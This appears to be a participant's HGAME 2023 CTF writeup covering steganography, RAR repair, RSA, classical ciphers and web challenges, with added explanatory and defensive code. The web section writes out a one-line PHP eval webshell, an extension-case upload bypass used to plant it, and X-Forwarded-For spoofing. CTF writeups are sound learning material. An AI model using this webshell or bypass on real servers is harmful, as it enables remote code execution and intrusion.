Week1

misc

Check-in

base64

hgame{Welcome_To_HGAME2023!}

e99p1ant_want_girlfriend

Change the image size (restore the dimensions in the file header).


Mysterious Poster

Extracting the LSB of the RGB channels (bit plane 0) gives:

Sure enough, you still remember what we talked about at that time! This is part of the secret: `hgame{U_Kn0w_LSB&W`.I put the rest of the content here, https://drive.google.com/file/d/13kBos3Ixlfwkf3e0z0kJTEqBxm7RUk-G/view?usp=sharing, if you directly access the google drive cloud disk download in China, it will be very slow, you can try to use Scientific Internet access solves the problem of slow or inaccessible access to external network resources. This is my favorite music, there is another part of the secret in the music, I use Steghide to encrypt, the password is also the 6-digit password we agreed at the time, even if someone else finds out here, it should not be so easy to crack ( ( hope so
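As an added example (not the writeup's own tooling) of what "LSB RGB0" extraction actually does: the code below reads bit 0 of the R, G and B channel of every pixel in scan order, packs the bits MSB-first into bytes and stops at a NUL byte. Pixels are modelled as a plain list of (r, g, b) tuples so it runs without an image library (with Pillow the same list comes from `Image.open(path).convert("RGB").getdata()`); the 8x8 cover image, the embedding helper and the message are constructed for the demo.

```python
# Added example: LSB "RGB0" extraction, the operation a stego tool performs on the poster.
# Pixels are (r, g, b) tuples in row-major order; no image library needed.

def lsb_bits(pixels):
    """Yield bit 0 of R, G and B for every pixel, in scan order."""
    for r, g, b in pixels:
        yield r & 1
        yield g & 1
        yield b & 1

def extract_lsb_rgb0(pixels, max_bytes=None):
    """Pack the LSB stream into bytes, MSB first; stop at a NUL byte or max_bytes."""
    out = bytearray()
    byte = 0
    nbits = 0
    for bit in lsb_bits(pixels):
        byte = (byte << 1) | bit
        nbits += 1
        if nbits == 8:
            if byte == 0:           # NUL terminator (a design choice for this demo)
                break
            out.append(byte)
            byte = 0
            nbits = 0
            if max_bytes is not None and len(out) >= max_bytes:
                break
    return bytes(out)

def embed_lsb_rgb0(pixels, message):
    """Constructed carrier: write message bytes plus a NUL terminator into bit 0."""
    bits = []
    for byte in message + b"\x00":
        bits.extend((byte >> i) & 1 for i in range(7, -1, -1))
    if len(bits) > 3 * len(pixels):
        raise ValueError("carrier too small for the message")
    flat = [c for px in pixels for c in px]
    for i, bit in enumerate(bits):
        flat[i] = (flat[i] & ~1) | bit
    return [tuple(flat[i:i + 3]) for i in range(0, len(flat), 3)]

def demo():
    # Constructed 8x8 "image" with arbitrary channel values.
    cover = [((x * 37) & 0xFF, (y * 91) & 0xFF, ((x + y) * 13) & 0xFF)
             for y in range(8) for x in range(8)]
    stego = embed_lsb_rgb0(cover, b"hgame{LSB}")
    return extract_lsb_rgb0(stego)

if __name__ == "__main__":
    print(demo())
```

The real poster had no terminator, which is why the tool dumped the whole bit plane as the long run of text above; the order in which channels and bit planes are read (R,G,B per pixel versus one channel at a time, LSB versus MSB first) is exactly the set of options stego viewers expose, and picking the wrong one yields noise rather than an error.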

The first half of the flag is

hgame{U_Kn0w_LSB&W; the second half is downloaded from the Google Drive link.

The hint says Steghide with a 6-digit password, so generate a wordlist:

crunch 6 6 0123456789 -o 6dig.txt

Then run the Steghide brute-force script copied from earlier:

#! /bin/python3
from subprocess import *

def foo():
    stegoFile='Bossnova.wav'
    extractFile='passwd.txt'   # output file for the extracted payload
    passFile='6dig.txt'        # wordlist

    errors=['could not extract','steghide --help','Syntax error']
    cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
    f=open(passFile,'r')

    for line in f.readlines():
        cmd=cmdFormat %(stegoFile,extractFile,line.strip())
        p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
        # steghide's output, decoded as GBK on a Chinese console; ignore undecodable bytes
        content=str(p.stdout.read(),'gbk',errors='ignore')
        for err in errors:
            if err in content:
                break
        else:                  # no error message in the output: this passphrase worked
            print(content)
            print('the passphrase is %s' %(line.strip()))
    f.close()
    return

if __name__ == '__main__':
    foo()
    print('ok')

After running for a while, the password is 123456.

Later the official writeup said that for a 6-digit password you should just try 123456 first... well.


hgame{U_Kn0w_LSB&Wav^Mp3_Stego}

where i am

Export the HTTP object to get an archive; opening it in WinRAR asks for a password and warns that the file header is damaged.


The plan is to repair the RAR and then brute-force it, but I'm so sleepy; I'll look into how to repair the RAR after a nap.

It turned out my 010 Editor template was too old to parse it. With the updated template it parses, and the header CRC is wrong.


Fixing the CRC makes the error go away. Then, guessing it's RAR pseudo-encryption, change the "Exchangeable" something-or-other field.
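To make the two repair steps concrete, here is an added example (not the writeup's; the author did this in 010 Editor) that assumes the RAR 4.x block layout as I remember it: a 2-byte little-endian HEAD_CRC holding the low 16 bits of CRC32 over the remaining header bytes, a 1-byte HEAD_TYPE (0x74 for a file header), 2-byte HEAD_FLAGS where bit 0x04 marks the file as password-protected, and a 2-byte HEAD_SIZE. Those offsets and flag values are assumptions here, and the header bytes are constructed, not taken from the challenge archive.

```python
import struct
import zlib

# Added example (not the writeup's code). Assumed RAR 4.x block layout:
#   HEAD_CRC   (2, LE) low 16 bits of CRC32 over bytes [2:HEAD_SIZE]
#   HEAD_TYPE  (1)     0x74 = file header
#   HEAD_FLAGS (2, LE) bit 0x04 = file is password-protected, bit 0x8000 = long block
#   HEAD_SIZE  (2, LE) total header length including these 7 bytes
FILE_HEAD = 0x74
LHD_PASSWORD = 0x0004
LONG_BLOCK = 0x8000

def header_crc(block):
    """CRC the way the archiver checks it: CRC32 of the header after the CRC field, low 16 bits."""
    head_size = struct.unpack_from("<H", block, 5)[0]
    return zlib.crc32(block[2:head_size]) & 0xFFFF

def parse_header(block):
    head_crc, head_type, head_flags, head_size = struct.unpack_from("<HBHH", block, 0)
    return {"crc": head_crc, "type": head_type, "flags": head_flags,
            "size": head_size, "crc_ok": head_crc == header_crc(block)}

def build_header(flags, rest):
    """Assemble a file header with a correct HEAD_CRC (rest = everything after HEAD_SIZE)."""
    size = 7 + len(rest)
    body = struct.pack("<BHH", FILE_HEAD, flags, size) + rest
    return struct.pack("<H", zlib.crc32(body) & 0xFFFF) + body

def fix_crc(block):
    """Step 1 of the writeup: rewrite HEAD_CRC so it matches the header bytes."""
    return struct.pack("<H", header_crc(block)) + block[2:]

def clear_password_flag(block):
    """Step 2 (pseudo-encryption): clear the password bit and recompute the CRC."""
    hdr = parse_header(block)
    rest = block[7:hdr["size"]]
    return build_header(hdr["flags"] & ~LHD_PASSWORD, rest) + block[hdr["size"]:]

def demo():
    # Constructed header; in a real file 'rest' holds PACK_SIZE, UNP_SIZE, ..., FILE_NAME.
    rest = struct.pack("<II", 1234, 5678) + b"\x00" * 13 + b"flag.jpg"
    genuine = build_header(LONG_BLOCK, rest) + b"<packed data>"
    # Simulate the tampering: set the password bit without updating HEAD_CRC.
    tampered = bytearray(genuine)
    tampered[3] |= LHD_PASSWORD          # low byte of HEAD_FLAGS
    tampered = bytes(tampered)
    repaired = clear_password_flag(fix_crc(tampered))
    return parse_header(genuine), parse_header(tampered), parse_header(repaired), repaired == genuine

if __name__ == "__main__":
    for h in demo()[:3]:
        print(h)
```

A header whose CRC doesn't match is either corrupt or edited; recomputing it only tells the archiver to trust the bytes again, so the second function is what actually removes the password prompt when no data was really encrypted. If the data were genuinely encrypted, clearing the flag would just make extraction produce garbage.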


A JPG is extracted; view its EXIF data with exiftool.


Per the challenge description, the flag is hgame{116_24_1488_E_39_54_5418_N}

crypto

RSA

Factor the modulus with factordb:

p =  11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q = 12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953

With p, q and e known, decrypt:

import gmpy2

p = 11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q = 12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953
e = 65537
c = 110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582

n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)       # private exponent d = e^-1 mod phi(n)
m = gmpy2.powmod(c, d, n)      # m = c^d mod n
print(m)
print(hex(m)[2:])              # plaintext as hex
# hex to text; to_bytes avoids the odd-length error bytes.fromhex would raise
print(int(m).to_bytes((int(m).bit_length() + 7) // 8, 'big'))

Mysterious Phone Call

Drop the Morse audio into Audition and type out the dashes and dots by hand:

----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- .... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- .- --- --.- - -- ..-. .-.

giving

0223E_PRIIBLY__HONWA_JMGH_FGKCQAOQTMFR

Then base64-decoding the other txt gives:

A few weeks ago we received a mysterious message. But the message is encrypted layer upon layer and we don't know what it really means. The only thing known concerns the key: "Only by climbing backwards over the eighteen-layer fence can you reach the end of Norse mythology."

Backwards (reverse): rfmtqoaqckgfhgmjawnohylbiirpe3220

Eighteen layers (ROT18): eszgdbndpxtsutzwnjabulyovvecr8775

Fence (rail fence):
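Added example (not the author's; they decoded the Morse by hand) that carries the steps above in code: a Morse table covering letters, digits and the `..--.-` underscore, then the reverse and ROT18 (ROT13 on letters plus ROT5 on digits) transformations exactly as the writeup applies them, underscores dropped and lowercased. The rail-fence decoder is a general zigzag decoder for the "Fence" step the writeup left open; the rail count for this challenge is not stated on the page, so it is exercised on a textbook input instead.

```python
# Added example: Morse decode, then the reverse / ROT18 steps from the writeup,
# plus a generic rail-fence decoder for the step the writeup did not finish.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "..--.-": "_", ".-.-.-": ".", "--..--": ",", "..--..": "?", "-....-": "-",
}

def morse_decode(text):
    """Decode space-separated Morse tokens; '/' separates words, unknown tokens become '?'."""
    out = []
    for token in text.split():
        out.append(" " if token == "/" else MORSE.get(token, "?"))
    return "".join(out)

def rot18(text):
    """ROT13 on letters plus ROT5 on digits; the transform is its own inverse."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + 13) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + 13) % 26 + 65))
        elif "0" <= ch <= "9":
            out.append(chr((ord(ch) - 48 + 5) % 10 + 48))
        else:
            out.append(ch)
    return "".join(out)

def rail_fence_decode(cipher, rails):
    """Undo a zigzag rail-fence transposition with the given number of rails."""
    n = len(cipher)
    if rails < 2 or n == 0:
        return cipher
    cycle = 2 * (rails - 1)
    rail_of = [min(i % cycle, cycle - i % cycle) for i in range(n)]
    # Positions in the order the encoder emitted them: rail by rail, left to right.
    order = sorted(range(n), key=lambda i: (rail_of[i], i))
    plain = [""] * n
    for idx, pos in enumerate(order):
        plain[pos] = cipher[idx]
    return "".join(plain)

# The Morse transcribed in the writeup.
MORSE_TEXT = ("----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- "
              ".... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- "
              ".- --- --.- - -- ..-. .-.")

def writeup_steps(morse=MORSE_TEXT):
    """Morse -> plaintext -> reversed (underscores dropped, lowercased) -> ROT18."""
    plain = morse_decode(morse)
    reversed_ = plain[::-1].replace("_", "").lower()
    return plain, reversed_, rot18(reversed_)

if __name__ == "__main__":
    for step in writeup_steps():
        print(step)
```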

Damn, what even is this.

After reading the writeup: the "18 layers" is Vigenère 18. Excuse me?


web

Become A Member

It's a request-header problem; capture the request with Burp Suite:

GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:31614
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, Vidar
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: code=Vidar
Referer: bunnybunnybunny.com
X-Forwarded-For: 127.0.0.1
Content-Length: 54

{"username": "luckytoday", "password": "happy123"}

I had thought it was a custom "code" field that had to be set to Vidar.
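Added example (not part of the writeup, which solved this in Burp): a small parser for the raw request above and a gate applying the checks the challenge appears to enforce, inferred from that request: User-Agent, a token in Accept-Encoding, the `code` cookie, the Referer, X-Forwarded-For and the JSON credentials. The raw request is a constructed copy (Content-Length trimmed to match this body). The point for a defender is in `client_ip`: every one of those values is chosen by the client, and X-Forwarded-For in particular should only be honoured when the TCP peer is a proxy you operate.

```python
import json

# Constructed copy of the captured request (CRLF line endings, Content-Length of this body).
RAW_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: week-1.hgame.lwsec.cn:31614\r\n"
    "User-Agent: Cute-Bunny\r\n"
    "Accept-Encoding: gzip, deflate, Vidar\r\n"
    "Cookie: code=Vidar\r\n"
    "Referer: bunnybunnybunny.com\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n"
    "Content-Length: 50\r\n"
    "\r\n"
    '{"username": "luckytoday", "password": "happy123"}'
)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into request line, lower-cased header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}

def parse_cookies(header_value):
    cookies = {}
    for part in header_value.split(";"):
        k, _, v = part.strip().partition("=")
        if k:
            cookies[k] = v
    return cookies

def header_gate(req):
    """Checks inferred from the captured request; every input is client-supplied."""
    h = req["headers"]
    checks = {
        "user_agent": h.get("user-agent") == "Cute-Bunny",
        "accept_encoding": "Vidar" in [t.strip() for t in h.get("accept-encoding", "").split(",")],
        "cookie": parse_cookies(h.get("cookie", "")).get("code") == "Vidar",
        "referer": "bunnybunnybunny.com" in h.get("referer", ""),
        "x_forwarded_for": h.get("x-forwarded-for", "").split(",")[0].strip() == "127.0.0.1",
    }
    try:
        body = json.loads(req["body"] or "{}")
    except json.JSONDecodeError:
        body = {}
    checks["credentials"] = (body.get("username") == "luckytoday"
                             and body.get("password") == "happy123")
    return checks

def all_pass(req):
    return all(header_gate(req).values())

def client_ip(peer_addr, headers, trusted_proxies=frozenset()):
    """Only honour X-Forwarded-For when the TCP peer is a proxy we operate;
    the rightmost entry is the one our own proxy appended."""
    xff = headers.get("x-forwarded-for", "")
    if peer_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return peer_addr

if __name__ == "__main__":
    req = parse_request(RAW_REQUEST)
    print(header_gate(req))
    print(client_ip("203.0.113.9", req["headers"]))
```

A service that reads `X-Forwarded-For` straight from the request and compares it with 127.0.0.1 is treating an attacker-controlled string as a network location; the fix is to take the address from the socket, or from the header only behind a trusted proxy that overwrites it.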

Classic Childhood Game

Surely nobody fails to clear floor 8 of Magic Tower?


That's right, I can't. It's a single-player game, so I'm cheating, and anyone who flames me for it can get lost.

Found core.js under Sources, but Ctrl+F didn't turn up the win logic, so I started an impatient audit and, halfway through, just patched it directly.


Buy defence or attack in the shop, or pick up gems: whatever it is adds 1000, gold grows the more you spend and keys multiply the more doors you open; steamroll through to the flag.

Later, reading the writeup, the ending logic is in res/event.js.


Just call mota() in the console and that's it.

Note that this mota() function is heavily obfuscated.


Deobfuscating it: another time.

Show Me Your Beauty

An avatar upload form that tells you the avatar is stored at ./img/*.

So write a one-line webshell: <?php @eval($_POST['pillar']); ?>

Upload it: the front end filters the file extension, so rename it to .jpg, intercept the request and change it back to .php. The back end filters too; other extensions such as php5, php4 and phtml don't get through either.


Trying a case variation of the extension works.


Browsing to it confirms it's accessible.


Then connect with AntSword; the flag is in the root directory.
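Added example (not the challenge's PHP, which isn't on the page) of the kind of check the case bypass above defeats, a case-sensitive blacklist, next to a hardened version that lower-cases and allow-lists the extension, rejects double extensions, checks the file's magic bytes and stores the file under a server-chosen name. The blacklist contents, the allowed types and the filenames in the demo are assumed.

```python
import os
import re

# Added example: weak extension blacklist beside a hardened allow-list check.
BLACKLIST = {".php", ".php4", ".php5", ".phtml"}          # assumed weak filter
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}                # assumed allow-list
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}

def weak_is_allowed(filename):
    """Case-sensitive blacklist: '.PHP' is not in the set, so it passes."""
    _, ext = os.path.splitext(filename)
    return ext not in BLACKLIST

def safe_extension(filename):
    """Normalise, then allow-list; returns the lower-cased extension or None."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path component
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return None
    stem = base[:-len(ext)]
    # Reject "x.php.jpg"-style double extensions and anything odd in the name.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    return ext

def hardened_is_allowed(filename):
    return safe_extension(filename) is not None

def content_matches(ext, data):
    """Cheap sanity check that the first bytes look like the claimed image type."""
    return data.startswith(MAGIC[ext])

def stored_name(filename, random_token):
    """Store under a server-chosen name; never reuse the client's filename."""
    ext = safe_extension(filename)
    if ext is None:
        raise ValueError("rejected upload")
    return random_token + ext

if __name__ == "__main__":
    for name in ("avatar.jpg", "shell.php", "shell.PHP", "shell.php.jpg"):
        print(name, weak_is_allowed(name), hardened_is_allowed(name))
```

Even the hardened version is only one layer: a magic-byte check passes a polyglot with a valid JPEG header and PHP appended, so the upload directory must also be served without script execution (and ideally sit outside the web root).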


Guess Who I Am

Following the hint, get the member list from https://github.com/Potat0000/Vidar-Website/blob/master/src/scripts/config/member.js

Seeing that this JS just does export default, I thought I'd learn something and write the script in JS, but the Node.js environment is a bit of a pain, switching between CommonJS and ES6 made me dizzy, so back to the comfort zone.

import requests

fp = open('./member.js', 'rb')

id_tmp = ""
intro_tmp = ""
dic = {}          # intro text -> member id, scraped line by line from member.js

for line in fp.readlines():
    if b'"id"' in line:
        id_tmp = line.decode().replace(' ', '')[6:-4]
    if b'"intro"' in line:
        intro_tmp = line.decode().replace(' ', '')[9:-4]
        dic[intro_tmp] = id_tmp
        id_tmp = ""
        intro_tmp = ""

fp.close()

session = requests.session()
url = 'http://week-1.hgame.lwsec.cn:30128/api/getQuestion'
resp = session.get(url)
cookies = resp.cookies.get_dict()
# strip the JSON wrapper around the intro text and look up the matching id
res = dic[resp.content.decode()[12:-2].replace("\\u0026", "&").replace(' ', '')]

for i in range(100):
    url1 = "http://week-1.hgame.lwsec.cn:30128/api/verifyAnswer"
    data = {"id": res}
    resp1 = session.post(url1, cookies=cookies, data=data)
    print(resp1.text)
    cookies = resp1.cookies.get_dict()
    url2 = "http://week-1.hgame.lwsec.cn:30128/api/getScore"
    resp2 = session.get(url2, cookies=cookies)
    print(resp2.text)
    cookies = resp2.cookies.get_dict()
    url = 'http://week-1.hgame.lwsec.cn:30128/api/getQuestion'
    resp = session.get(url, cookies=cookies)
    cookies = resp.cookies.get_dict()
    res = dic[resp.content.decode()[12:-2].replace("\\u0026", "&").replace(' ', '')]
